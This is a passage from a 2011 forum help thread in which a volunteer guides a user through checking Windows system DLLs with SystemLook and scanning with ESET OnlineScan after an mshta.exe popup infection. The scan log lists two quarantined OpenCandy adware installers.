Hi DaFe,

You can try restarting. But first,

Rerun SystemLook
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :file
    C:\Windows\SYSTEM32\ntdll.dll
    C:\Windows\SYSTEM32\wow64.dll
    C:\Windows\SYSTEM32\wow64win.dll
    C:\Windows\SYSTEM32\wow64cpu.dll
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
Regards,
Jason

 



#11 DaFe
  • Topic Starter
  • Members
  • 10 posts

Posted 05 August 2011 - 02:22 PM

Here you go:

SystemLook 30.07.11 by jpshortstuff
Log created at 22:21 on 05/08/2011 by onoff
Administrator - Elevation successful

========== file ==========

C:\Windows\SYSTEM32\ntdll.dll - File found and opened.
MD5: 678084C231715CB38A23D7326D6839BA
Created at 15:17 on 09/02/2011
Modified at 05:16 on 27/10/2010
Size: 1739176 bytes
Attributes: --a----
FileDescription: NT Layer -kirjasto (DLL)
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
ProductVersion: 6.1.7600.16385
OriginalFilename: ntdll.dll.mui
InternalName: ntdll.dll
ProductName: Microsoft® Windows® -käyttöjärjestelmä
CompanyName: Microsoft Corporation
LegalCopyright: © Microsoft Corporation. Kaikki oikeudet pidätetään.

C:\Windows\SYSTEM32\wow64.dll - File found and opened.
MD5: E083B12FDC1D00E57E70C397ADFB3F0C
Created at 15:54 on 16/11/2010
Modified at 08:36 on 22/12/2009
Size: 243200 bytes
Attributes: --a----
FileDescription: Win32 Emulation on NT64
FileVersion: 6.1.7600.16491 (win7_gdr.091221-1602)
ProductVersion: 6.1.7600.16491
OriginalFilename: wow64.dll
InternalName: wow64
ProductName: Microsoft® Windows® Operating System
CompanyName: Microsoft Corporation
LegalCopyright: © Microsoft Corporation. All rights reserved.

C:\Windows\SYSTEM32\wow64win.dll - File found and opened.
MD5: 982A28EE7BADBF30B6BC774035DD318F
Created at 23:38 on 13/07/2009
Modified at 01:41 on 14/07/2009
Size: 361984 bytes
Attributes: --a----
FileDescription: Wow64 Console and Win32 API Logging
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
ProductVersion: 6.1.7600.16385
OriginalFilename: wow64lg2.dll
InternalName: wow64lg2
ProductName: Microsoft® Windows® Operating System
CompanyName: Microsoft Corporation
LegalCopyright: © Microsoft Corporation. All rights reserved.

C:\Windows\SYSTEM32\wow64cpu.dll - File found and opened.
MD5: 5E39878945C109AC68AC81A96DF4EC77
Created at 23:26 on 13/07/2009
Modified at 01:41 on 14/07/2009
Size: 13312 bytes
Attributes: --a----
FileDescription: AMD64 Wow64 CPU
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
ProductVersion: 6.1.7600.16385
OriginalFilename: wow64cpu.dll
InternalName: wow64cpu
ProductName: Microsoft® Windows® Operating System
CompanyName: Microsoft Corporation
LegalCopyright: © Microsoft Corporation. All rights reserved.

-= EOF =-

#12 jntkwx
  • Malware Response Team
  • 4,339 posts
  • Gender:Male
  • Location:New England, U.S.A.

Posted 05 August 2011 - 02:29 PM

I don't think those files have been modified (which is what I suspected), so go ahead and restart.
Regards,
Jason

 



#13 DaFe
  • Topic Starter
  • Members
  • 10 posts

Posted 05 August 2011 - 02:50 PM

After restart, the popup didn't return, nor does mshta.exe show up in my processes list. Should I assume my system is clean now? I'm still slightly scared that it'll return when some of the scheduled tasks come up and run.

#14 jntkwx
  • Malware Response Team
  • 4,339 posts
  • Gender:Male
  • Location:New England, U.S.A.

Posted 05 August 2011 - 02:52 PM

1. I'd like us to scan your machine with ESET OnlineScan
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the ESET Online Scanner button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the esetsmartinstaller_enu.exe icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

Regards,
Jason

 



#15 DaFe
  • Topic Starter
  • Members
  • 10 posts

Posted 05 August 2011 - 05:30 PM

And here you go:

C:\Users\onoff\AppData\Local\Temp\mirc717.exe Win32/OpenCandy application deleted - quarantined
C:\Users\onoff\Downloads\mirc717.exe Win32/OpenCandy application deleted - quarantined

Those files should far predate the start of this problem.

Something odd did happen during the scan - my computer suddenly went to standby mode in the middle of the scan. As this is a laptop hooked to an external screen and kb/mouse that I use with the lid closed, it's possible that the external power got cut for a split second, triggering the standby mode.



